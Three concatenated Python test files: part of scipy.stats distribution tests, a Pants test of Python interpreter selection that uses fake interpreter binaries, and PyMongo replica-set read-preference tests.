class TestGumbelLeft(ContinuousTestBase, TestCase):
dist = scipy.stats.gumbel_l
class TestHalfCauchy(ContinuousTestBase, TestCase):
dist = scipy.stats.halfcauchy
class TestHalfLogistic(ContinuousTestBase, TestCase):
dist = scipy.stats.halflogistic
class TestHalfNormal(ContinuousTestBase, TestCase):
dist = scipy.stats.halfnorm
class TestHalfGeneralizedNormal(ContinuousTestBase, TestCase):
dist = scipy.stats.halfgennorm
class TestHyperbolicSecant(ContinuousTestBase, TestCase):
dist = scipy.stats.hypsecant
class TestInverseGamma(ContinuousTestBase, TestCase):
dist = scipy.stats.invgamma
class TestInverseGauss(ContinuousTestBase, TestCase):
dist = scipy.stats.invgauss
class TestInverseWeibull(ContinuousTestBase, TestCase):
dist = scipy.stats.invweibull
class TestJohnsonSB(ContinuousTestBase, TestCase):
dist = scipy.stats.johnsonsb
class TestJohnsonSU(ContinuousTestBase, TestCase):
dist = scipy.stats.johnsonsu
@skip('???')
class TestKolmogorovSmirnovOneSided(ContinuousTestBase, TestCase):
dist = scipy.stats.ksone
class TestKolmogorovSmirnovTwoSided(ContinuousTestBase, TestCase):
dist = scipy.stats.kstwobign
class TestLaplace(ContinuousTestBase, TestCase):
dist = scipy.stats.laplace
class TestLevy(ContinuousTestBase, TestCase):
dist = scipy.stats.levy
class TestLeftSkewedLevy(ContinuousTestBase, TestCase):
dist = scipy.stats.levy_l
@skip('???')
class TestLevyStable(ContinuousTestBase, TestCase):
dist = scipy.stats.levy_stable
class TestLogistic(ContinuousTestBase, TestCase):
dist = scipy.stats.logistic
class TestLogGamma(ContinuousTestBase, TestCase):
dist = scipy.stats.loggamma
class TestLogLaplace(ContinuousTestBase, TestCase):
dist = scipy.stats.loglaplace
class TestLogNormal(ContinuousTestBase, TestCase):
dist = scipy.stats.lognorm
class TestLomax(ContinuousTestBase, TestCase):
dist = scipy.stats.lomax
class TestMaxwell(ContinuousTestBase, TestCase):
dist = scipy.stats.maxwell
class TestMielke(ContinuousTestBase, TestCase):
dist = scipy.stats.mielke
class TestNakagami(ContinuousTestBase, TestCase):
dist = scipy.stats.nakagami
class TestNonCentralChiSquared(ContinuousTestBase, TestCase):
dist = scipy.stats.ncx2
class TestNonCentralF(ContinuousTestBase, TestCase):
dist = scipy.stats.ncf
params = [(27, 27, 0.415784417992)]
class TestNonCentralT(ContinuousTestBase, TestCase):
dist = scipy.stats.nct
class TestNormal(ContinuousTestBase, TestCase):
dist = scipy.stats.norm
class TestPareto(ContinuousTestBase, TestCase):
dist = scipy.stats.pareto
class TestPearson3(ContinuousTestBase, TestCase):
dist = scipy.stats.pearson3
class TestPowerLaw(ContinuousTestBase, TestCase):
dist = scipy.stats.powerlaw
class TestPowerNormal(ContinuousTestBase, TestCase):
dist = scipy.stats.powernorm
class TestRDistributed(ContinuousTestBase, TestCase):
dist = scipy.stats.rdist
class TestReciprocal(ContinuousTestBase, TestCase):
dist = scipy.stats.reciprocal
params = [tuple(numpy.array([0, 1]) + rand(1)[0])]
class TestRayleigh(ContinuousTestBase, TestCase):
dist = scipy.stats.rayleigh
class TestRice(ContinuousTestBase, TestCase):
dist = scipy.stats.rice
class TestReciprocalInverseGaussian(ContinuousTestBase, TestCase):
dist = scipy.stats.recipinvgauss
class TestSemicircular(ContinuousTestBase, TestCase):
dist = scipy.stats.semicircular
class TestT(ContinuousTestBase, TestCase):
dist = scipy.stats.t
class TestTrapz(ContinuousTestBase, TestCase):
dist = scipy.stats.trapz
params = [(1 / 3, 2 / 3)]
class TestTriangular(ContinuousTestBase, TestCase):
dist = scipy.stats.triang
params = [tuple(rand(1))]
class TestTruncatedExponential(ContinuousTestBase, TestCase):
dist = scipy.stats.truncexpon
class TestTruncatedNormal(ContinuousTestBase, TestCase):
dist = scipy.stats.truncnorm
params = [(0.1, 2.0)]
class TestTukeyLambda(ContinuousTestBase, TestCase):
dist = scipy.stats.tukeylambda
class TestUniform(ContinuousTestBase, TestCase):
dist = scipy.stats.uniform
class TestVonMises(ContinuousTestBase, TestCase):
dist = scipy.stats.vonmises
params = [tuple(1.0 + rand(1))]
class TestVonMisesLine(ContinuousTestBase, TestCase):
dist = scipy.stats.vonmises_line
class TestWald(ContinuousTestBase, TestCase):
dist = scipy.stats.wald
class TestWeibullMin(ContinuousTestBase, TestCase):
dist = scipy.stats.weibull_min
class TestWeibullMax(ContinuousTestBase, TestCase):
dist = scipy.stats.weibull_max
class TestWrappedCauchy(ContinuousTestBase, TestCase):
dist = scipy.stats.wrapcauchy
params = [(0.5,)]
|
|
# Copyright 2016 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import json
import os
import unittest.mock
from textwrap import dedent
from typing import Tuple
from pex.interpreter import PythonInterpreter
from pants.backend.python.interpreter_cache import PythonInterpreterCache
from pants.backend.python.targets.python_library import PythonLibrary
from pants.backend.python.targets.python_requirement_library import PythonRequirementLibrary
from pants.backend.python.tasks.select_interpreter import SelectInterpreter
from pants.base.exceptions import TaskError
from pants.option.ranked_value import RankedValue
from pants.python.python_setup import PythonSetup
from pants.testutil.task_test_base import TaskTestBase
from pants.util.dirutil import chmod_plus_x, safe_mkdtemp
class SelectInterpreterTest(TaskTestBase):
@classmethod
def task_type(cls):
return SelectInterpreter
def setUp(self):
super().setUp()
# We're tied tightly to pex implementation details here faking out a python binary that outputs
# only one value no matter what arguments, environment or input stream it has attached. That
# value is the interpreter identity which is a JSON dict with exactly the following keys:
# binary, python_tag, abi_tag, platform_tag, version, supported_tags, env_markers.
def fake_interpreter(python_tag: str, abi_tag: str, version: Tuple[int, int, int]):
interpreter_dir = safe_mkdtemp()
binary = os.path.join(interpreter_dir, "python")
values = dict(
binary=binary,
python_tag=python_tag,
abi_tag=abi_tag,
platform_tag="",
version=version,
supported_tags=[],
env_markers={},
)
id_str = json.dumps(values)
with open(binary, "w") as fp:
fp.write(
dedent(
f"""
#!{PythonInterpreter.get().binary}
from __future__ import print_function
print({id_str!r})
"""
).strip()
)
chmod_plus_x(binary)
return PythonInterpreter.from_binary(binary)
# impl, abi, impl_version, major, minor, patch
self.fake_interpreters = [
fake_interpreter(python_tag="ip", abi_tag="ip2", version=(2, 77, 777)),
fake_interpreter(python_tag="ip", abi_tag="ip2", version=(2, 88, 888)),
fake_interpreter(python_tag="ip", abi_tag="ip2", version=(2, 99, 999)),
]
self.set_options_for_scope(
PythonSetup.options_scope,
interpreter_constraints=RankedValue(RankedValue.CONFIG, ["IronPython>=2.55"]),
interpreter_search_paths=[interpreter.binary for interpreter in self.fake_interpreters],
)
self.reqtgt = self.make_target(
spec="req", target_type=PythonRequirementLibrary, requirements=[],
)
self.tgt1 = self._fake_target("tgt1")
self.tgt2 = self._fake_target("tgt2", compatibility=["IronPython>2.77.777"])
self.tgt3 = self._fake_target("tgt3", compatibility=["IronPython>2.88.888"])
self.tgt4 = self._fake_target("tgt4", compatibility=["IronPython<2.99.999"])
self.tgt20 = self._fake_target("tgt20", dependencies=[self.tgt2])
self.tgt30 = self._fake_target("tgt30", dependencies=[self.tgt3])
self.tgt40 = self._fake_target("tgt40", dependencies=[self.tgt4])
def _fake_target(self, spec, compatibility=None, sources=None, dependencies=None):
return self.make_target(
spec=spec,
target_type=PythonLibrary,
sources=sources or [],
dependencies=dependencies,
compatibility=compatibility,
)
def _select_interpreter(self, target_roots, should_invalidate=None):
context = self.context(target_roots=target_roots)
task = self.create_task(context)
if should_invalidate is not None:
task._select_interpreter = unittest.mock.MagicMock(wraps=task._select_interpreter)
task.execute()
if should_invalidate is not None:
if should_invalidate:
task._select_interpreter.assert_called_once()
else:
task._select_interpreter.assert_not_called()
return context.products.get_data(PythonInterpreter)
def _select_interpreter_and_get_version(self, target_roots, should_invalidate=None):
"""Return the version string of the interpreter selected for the target roots."""
interpreter = self._select_interpreter(target_roots, should_invalidate)
self.assertTrue(isinstance(interpreter, PythonInterpreter))
return interpreter.version_string
def test_interpreter_selection(self):
self.assertIsNone(self._select_interpreter([]))
self.assertEqual(
"IronPython-2.77.777", self._select_interpreter_and_get_version([self.reqtgt])
)
self.assertEqual(
"IronPython-2.77.777", self._select_interpreter_and_get_version([self.tgt1])
)
self.assertEqual(
"IronPython-2.88.888", self._select_interpreter_and_get_version([self.tgt2])
)
self.assertEqual(
"IronPython-2.99.999", self._select_interpreter_and_get_version([self.tgt3])
)
self.assertEqual(
"IronPython-2.77.777", self._select_interpreter_and_get_version([self.tgt4])
)
self.assertEqual(
"IronPython-2.88.888", self._select_interpreter_and_get_version([self.tgt20])
)
self.assertEqual(
"IronPython-2.99.999", self._select_interpreter_and_get_version([self.tgt30])
)
self.assertEqual(
"IronPython-2.77.777", self._select_interpreter_and_get_version([self.tgt40])
)
self.assertEqual(
"IronPython-2.99.999", self._select_interpreter_and_get_version([self.tgt2, self.tgt3])
)
self.assertEqual(
"IronPython-2.88.888", self._select_interpreter_and_get_version([self.tgt2, self.tgt4])
)
with self.assertRaises(TaskError) as cm:
self._select_interpreter_and_get_version([self.tgt3, self.tgt4])
self.assertIn(
"Unable to detect a suitable interpreter for compatibilities: "
"IronPython<2.99.999 && IronPython>2.88.888",
str(cm.exception),
)
def test_invalidation_for_target_constraints(self):
tgta = self._fake_target(
"tgta", compatibility=["IronPython>2.77.777"], dependencies=[self.tgt3]
)
self.assertEqual(
"IronPython-2.99.999",
self._select_interpreter_and_get_version([tgta], should_invalidate=True),
)
# A new target with different sources, but identical compatibility, shouldn't invalidate.
self.create_file("tgtb/foo/bar/baz.py", "fake content")
tgtb = self._fake_target(
"tgtb",
compatibility=["IronPython>2.77.777"],
dependencies=[self.tgt3],
sources=["foo/bar/baz.py"],
)
self.assertEqual(
"IronPython-2.99.999",
self._select_interpreter_and_get_version([tgtb], should_invalidate=False),
)
def test_invalidation_for_global_constraints(self):
# Because the system is setup with interpreter constraints, the task should
# invalidate on the first run.
self._select_interpreter_and_get_version([self.tgt1], should_invalidate=True)
self.set_options_for_scope(
PythonSetup.options_scope,
interpreter_constraints=RankedValue(RankedValue.CONFIG, ["IronPython>2.77.777"]),
)
# After changing the global interpreter constraints, the task should invalidate.
self._select_interpreter_and_get_version([self.tgt1], should_invalidate=True)
# If the global constraints don't change, the task should not invalidate.
self._select_interpreter_and_get_version([self.tgt1], should_invalidate=False)
def test_compatibility_AND(self):
tgt = self._fake_target("tgt5", compatibility=["IronPython>2.77.777,<2.99.999"])
self.assertEqual("IronPython-2.88.888", self._select_interpreter_and_get_version([tgt]))
def test_compatibility_AND_impossible(self):
tgt = self._fake_target("tgt5", compatibility=["IronPython>2.77.777,<2.88.888"])
with self.assertRaises(PythonInterpreterCache.UnsatisfiableInterpreterConstraintsError):
self._select_interpreter_and_get_version([tgt])
def test_compatibility_OR(self):
tgt = self._fake_target("tgt6", compatibility=["IronPython>2.88.888", "IronPython<2.7"])
self.assertEqual("IronPython-2.99.999", self._select_interpreter_and_get_version([tgt]))
def test_compatibility_OR_impossible(self):
tgt = self._fake_target(
"tgt6", compatibility=["IronPython>2.99.999", "IronPython<2.77.777"]
)
with self.assertRaises(PythonInterpreterCache.UnsatisfiableInterpreterConstraintsError):
self._select_interpreter_and_get_version([tgt])
def test_stale_binary_detected(self):
interpreter1 = self._select_interpreter([self.tgt2])
os.remove(interpreter1.binary)
interpreter2 = self._select_interpreter([self.tgt2])
self.assertNotEqual(interpreter1.binary, interpreter2.binary)
|
|
# Copyright 2011-2015 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test the replica_set_connection module."""
import contextlib
import random
import sys
sys.path[0:0] = [""]
from bson.py3compat import MAXSIZE
from bson.son import SON
from pymongo.errors import ConfigurationError
from pymongo.message import _maybe_add_read_preference
from pymongo.mongo_client import MongoClient
from pymongo.read_preferences import (ReadPreference, MovingAverage,
Primary, PrimaryPreferred,
Secondary, SecondaryPreferred,
Nearest, _ServerMode)
from pymongo.server_selectors import any_server_selector
from pymongo.server_type import SERVER_TYPE
from pymongo.write_concern import WriteConcern
from test.test_replica_set_client import TestReplicaSetClientBase
from test import (SkipTest,
client_context,
host,
port,
unittest,
db_user,
db_pwd)
from test.utils import single_client, one, wait_until, rs_client
from test.version import Version
class TestReadPreferencesBase(TestReplicaSetClientBase):
def setUp(self):
super(TestReadPreferencesBase, self).setUp()
# Insert some data so we can use cursors in read_from_which_host
self.client.pymongo_test.test.drop()
self.client.get_database(
"pymongo_test",
write_concern=WriteConcern(w=self.w)).test.insert_many(
[{'_id': i} for i in range(10)])
self.addCleanup(self.client.pymongo_test.test.drop)
def read_from_which_host(self, client):
"""Do a find() on the client and return which host was used
"""
cursor = client.pymongo_test.test.find()
next(cursor)
return cursor.address
def read_from_which_kind(self, client):
"""Do a find() on the client and return 'primary' or 'secondary'
depending on which the client used.
"""
address = self.read_from_which_host(client)
if address == client.primary:
return 'primary'
elif address in client.secondaries:
return 'secondary'
else:
self.fail(
'Cursor used address %s, expected either primary '
'%s or secondaries %s' % (
address, client.primary, client.secondaries))
def assertReadsFrom(self, expected, **kwargs):
c = rs_client(**kwargs)
wait_until(
lambda: len(c.nodes) == self.w,
"discovered all nodes")
used = self.read_from_which_kind(c)
self.assertEqual(expected, used, 'Cursor used %s, expected %s' % (
used, expected))
class TestSingleSlaveOk(TestReadPreferencesBase):
def test_reads_from_secondary(self):
host, port = next(iter(self.client.secondaries))
# Direct connection to a secondary.
client = single_client(host, port)
self.assertFalse(client.is_primary)
# Regardless of read preference, we should be able to do
# "reads" with a direct connection to a secondary.
# See server-selection.rst#topology-type-single.
self.assertEqual(client.read_preference, ReadPreference.PRIMARY)
db = client.pymongo_test
coll = db.test
# Test find and find_one.
self.assertIsNotNone(coll.find_one())
self.assertEqual(10, len(list(coll.find())))
# Test some database helpers.
self.assertIsNotNone(db.collection_names())
self.assertIsNotNone(db.validate_collection("test"))
self.assertIsNotNone(db.command("count", "test"))
# Test some collection helpers.
self.assertEqual(10, coll.count())
self.assertEqual(10, len(coll.distinct("_id")))
self.assertIsNotNone(coll.aggregate([]))
self.assertIsNotNone(coll.index_information())
# Test some "magic" namespace helpers.
self.assertIsNotNone(db.current_op())
client.unlock() # No error.
class TestReadPreferences(TestReadPreferencesBase):
def test_mode_validation(self):
for mode in (ReadPreference.PRIMARY,
ReadPreference.PRIMARY_PREFERRED,
ReadPreference.SECONDARY,
ReadPreference.SECONDARY_PREFERRED,
ReadPreference.NEAREST):
self.assertEqual(
mode,
rs_client(read_preference=mode).read_preference)
self.assertRaises(
TypeError,
rs_client, read_preference='foo')
def test_tag_sets_validation(self):
# Can't use tags with PRIMARY
self.assertRaises(ConfigurationError, _ServerMode,
0, tag_sets=[{'k': 'v'}])
# ... but empty tag sets are ok with PRIMARY
self.assertRaises(ConfigurationError, _ServerMode,
0, tag_sets=[{}])
S = Secondary(tag_sets=[{}])
self.assertEqual(
[{}],
rs_client(read_preference=S).read_preference.tag_sets)
S = Secondary(tag_sets=[{'k': 'v'}])
self.assertEqual(
[{'k': 'v'}],
rs_client(read_preference=S).read_preference.tag_sets)
S = Secondary(tag_sets=[{'k': 'v'}, {}])
self.assertEqual(
[{'k': 'v'}, {}],
rs_client(read_preference=S).read_preference.tag_sets)
self.assertRaises(ValueError, Secondary, tag_sets=[])
# One dict not ok, must be a list of dicts
self.assertRaises(TypeError, Secondary, tag_sets={'k': 'v'})
self.assertRaises(TypeError, Secondary, tag_sets='foo')
self.assertRaises(TypeError, Secondary, tag_sets=['foo'])
def test_threshold_validation(self):
self.assertEqual(17, rs_client(
localThresholdMS=17
).local_threshold_ms)
self.assertEqual(42, rs_client(
localThresholdMS=42
).local_threshold_ms)
self.assertEqual(666, rs_client(
localthresholdms=666
).local_threshold_ms)
def test_primary(self):
self.assertReadsFrom(
'primary', read_preference=ReadPreference.PRIMARY)
def test_primary_with_tags(self):
# Tags not allowed with PRIMARY
self.assertRaises(
ConfigurationError,
rs_client, tag_sets=[{'dc': 'ny'}])
def test_primary_preferred(self):
self.assertReadsFrom(
'primary', read_preference=ReadPreference.PRIMARY_PREFERRED)
def test_secondary(self):
self.assertReadsFrom(
'secondary', read_preference=ReadPreference.SECONDARY)
def test_secondary_preferred(self):
self.assertReadsFrom(
'secondary', read_preference=ReadPreference.SECONDARY_PREFERRED)
def test_nearest(self):
# With high localThresholdMS, expect to read from any
# member
c = rs_client(
read_preference=ReadPreference.NEAREST,
localThresholdMS=10000) # 10 seconds
data_members = set(self.hosts).difference(set(self.arbiters))
# This is a probabilistic test; track which members we've read from so
# far, and keep reading until we've used all the members or give up.
# Chance of using only 2 of 3 members 10k times if there's no bug =
# 3 * (2/3)**10000, very low.
used = set()
i = 0
while data_members.difference(used) and i < 10000:
address = self.read_from_which_host(c)
used.add(address)
i += 1
not_used = data_members.difference(used)
latencies = ', '.join(
'%s: %dms' % (server.description.address,
server.description.round_trip_time)
for server in c._get_topology().select_servers(any_server_selector))
self.assertFalse(
not_used,
"Expected to use primary and all secondaries for mode NEAREST,"
" but didn't use %s\nlatencies: %s" % (not_used, latencies))
class ReadPrefTester(MongoClient):
def __init__(self, *args, **kwargs):
self.has_read_from = set()
super(ReadPrefTester, self).__init__(*args, **kwargs)
@contextlib.contextmanager
def _socket_for_reads(self, read_preference):
context = super(ReadPrefTester, self)._socket_for_reads(read_preference)
with context as (sock_info, slave_ok):
self.record_a_read(sock_info.address)
yield sock_info, slave_ok
def record_a_read(self, address):
server = self._get_topology().select_server_by_address(address, 0)
self.has_read_from.add(server)
_PREF_MAP = [
(Primary, SERVER_TYPE.RSPrimary),
(PrimaryPreferred, SERVER_TYPE.RSPrimary),
(Secondary, SERVER_TYPE.RSSecondary),
(SecondaryPreferred, SERVER_TYPE.RSSecondary),
(Nearest, 'any')
]
class TestCommandAndReadPreference(TestReplicaSetClientBase):
def setUp(self):
super(TestCommandAndReadPreference, self).setUp()
self.c = ReadPrefTester(
'%s:%s' % (host, port),
replicaSet=self.name,
# Ignore round trip times, to test ReadPreference modes only.
localThresholdMS=1000*1000)
if client_context.auth_enabled:
self.c.admin.authenticate(db_user, db_pwd)
self.client_version = Version.from_client(self.c)
self.addCleanup(self.c.drop_database, 'pymongo_test')
def executed_on_which_server(self, client, fn, *args, **kwargs):
"""Execute fn(*args, **kwargs) and return the Server instance used."""
client.has_read_from.clear()
fn(*args, **kwargs)
self.assertEqual(1, len(client.has_read_from))
return one(client.has_read_from)
def assertExecutedOn(self, server_type, client, fn, *args, **kwargs):
server = self.executed_on_which_server(client, fn, *args, **kwargs)
self.assertEqual(SERVER_TYPE._fields[server_type],
SERVER_TYPE._fields[server.description.server_type])
def _test_fn(self, server_type, fn):
for _ in range(10):
if server_type == 'any':
used = set()
for _ in range(1000):
server = self.executed_on_which_server(self.c, fn)
used.add(server.description.address)
if len(used) == len(self.c.secondaries) + 1:
# Success
break
unused = self.c.secondaries.union(
set([self.c.primary])
).difference(used)
if unused:
self.fail(
"Some members not used for NEAREST: %s" % (
unused))
else:
self.assertExecutedOn(server_type, self.c, fn)
def _test_primary_helper(self, func):
# Helpers that ignore read preference.
self._test_fn(SERVER_TYPE.RSPrimary, func)
def _test_coll_helper(self, secondary_ok, coll, meth, *args, **kwargs):
for mode, server_type in _PREF_MAP:
new_coll = coll.with_options(read_preference=mode())
func = lambda: getattr(new_coll, meth)(*args, **kwargs)
if secondary_ok:
self._test_fn(server_type, func)
else:
self._test_fn(SERVER_TYPE.RSPrimary, func)
def test_command(self):
# Test that the generic command helper obeys the read preference
# passed to it.
for mode, server_type in _PREF_MAP:
func = lambda: self.c.pymongo_test.command('dbStats',
read_preference=mode())
self._test_fn(server_type, func)
def test_create_collection(self):
# Collections should be created on primary, obviously
self._test_primary_helper(
lambda: self.c.pymongo_test.create_collection(
'some_collection%s' % random.randint(0, MAXSIZE)))
def test_drop_collection(self):
self._test_primary_helper(
lambda: self.c.pymongo_test.drop_collection('some_collection'))
self._test_primary_helper(
lambda: self.c.pymongo_test.some_collection.drop())
def test_group(self):
self._test_coll_helper(True, self.c.pymongo_test.test, 'group',
{'a': 1}, {}, {}, 'function() { }')
def test_map_reduce(self):
# mapreduce fails if no collection
coll = self.c.pymongo_test.test.with_options(
write_concern=WriteConcern(w=self.w))
coll.insert_one({})
self._test_coll_helper(False, self.c.pymongo_test.test, 'map_reduce',
'function() { }', 'function() { }', 'mr_out')
self._test_coll_helper(False, self.c.pymongo_test.test, 'map_reduce',
'function() { }', 'function() { }',
{'inline': 1})
def test_inline_map_reduce(self):
# mapreduce fails if no collection
coll = self.c.pymongo_test.test.with_options(
write_concern=WriteConcern(w=self.w))
coll.insert_one({})
self._test_coll_helper(True, self.c.pymongo_test.test,
'inline_map_reduce',
'function() { }', 'function() { }')
def test_count(self):
self._test_coll_helper(True, self.c.pymongo_test.test, 'count')
def test_distinct(self):
self._test_coll_helper(True, self.c.pymongo_test.test, 'distinct', 'a')
def test_aggregate(self):
if self.client_version.at_least(2, 1, 0):
self._test_coll_helper(True, self.c.pymongo_test.test,
'aggregate',
[{'$project': {'_id': 1}}])
class TestMovingAverage(unittest.TestCase):
def test_moving_average(self):
avg = MovingAverage()
self.assertIsNone(avg.get())
avg.add_sample(10)
self.assertAlmostEqual(10, avg.get())
avg.add_sample(20)
self.assertAlmostEqual(12, avg.get())
avg.add_sample(30)
self.assertAlmostEqual(15.6, avg.get())
class TestMongosAndReadPreference(unittest.TestCase):
def test_maybe_add_read_preference(self):
# Primary doesn't add $readPreference
out = _maybe_add_read_preference({}, Primary())
self.assertEqual(out, {})
pref = PrimaryPreferred()
out = _maybe_add_read_preference({}, pref)
self.assertEqual(
out, SON([("$query", {}), ("$readPreference", pref.document)]))
pref = PrimaryPreferred(tag_sets=[{'dc': 'nyc'}])
out = _maybe_add_read_preference({}, pref)
self.assertEqual(
out, SON([("$query", {}), ("$readPreference", pref.document)]))
pref = Secondary()
out = _maybe_add_read_preference({}, pref)
self.assertEqual(
out, SON([("$query", {}), ("$readPreference", pref.document)]))
pref = Secondary(tag_sets=[{'dc': 'nyc'}])
out = _maybe_add_read_preference({}, pref)
self.assertEqual(
out, SON([("$query", {}), ("$readPreference", pref.document)]))
# SecondaryPreferred without tag_sets doesn't add $readPreference
pref = SecondaryPreferred()
out = _maybe_add_read_preference({}, pref)
self.assertEqual(out, {})
pref = SecondaryPreferred(tag_sets=[{'dc': 'nyc'}])
out = _maybe_add_read_preference({}, pref)
self.assertEqual(
out, SON([("$query", {}), ("$readPreference", pref.document)]))
pref = Nearest()
out = _maybe_add_read_preference({}, pref)
self.assertEqual(
out, SON([("$query", {}), ("$readPreference", pref.document)]))
pref = Nearest(tag_sets=[{'dc': 'nyc'}])
out = _maybe_add_read_preference({}, pref)
self.assertEqual(
out, SON([("$query", {}), ("$readPreference", pref.document)]))
criteria = SON([("$query", {}), ("$orderby", SON([("_id", 1)]))])
pref = Nearest()
out = _maybe_add_read_preference(criteria, pref)
self.assertEqual(
out,
SON([("$query", {}),
("$orderby", SON([("_id", 1)])),
("$readPreference", pref.document)]))
pref = Nearest(tag_sets=[{'dc': 'nyc'}])
out = _maybe_add_read_preference(criteria, pref)
self.assertEqual(
out,
SON([("$query", {}),
("$orderby", SON([("_id", 1)])),
("$readPreference", pref.document)]))
@client_context.require_mongos
def test_mongos(self):
shard = client_context.client.config.shards.find_one()['host']
num_members = shard.count(',') + 1
if num_members == 1:
raise SkipTest("Need a replica set shard to test.")
coll = client_context.client.pymongo_test.get_collection(
"test",
write_concern=WriteConcern(w=num_members))
coll.drop()
res = coll.insert_many([{} for _ in range(5)])
first_id = res.inserted_ids[0]
last_id = res.inserted_ids[-1]
# Note - this isn't a perfect test since there's no way to
# tell what shard member a query ran on.
for pref in (Primary(),
PrimaryPreferred(),
Secondary(),
SecondaryPreferred(),
Nearest()):
qcoll = coll.with_options(read_preference=pref)
results = list(qcoll.find().sort([("_id", 1)]))
self.assertEqual(first_id, results[0]["_id"])
self.assertEqual(last_id, results[-1]["_id"])
results = list(qcoll.find().sort([("_id", -1)]))
self.assertEqual(first_id, results[-1]["_id"])
self.assertEqual(last_id, results[0]["_id"])
if __name__ == "__main__":
unittest.main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.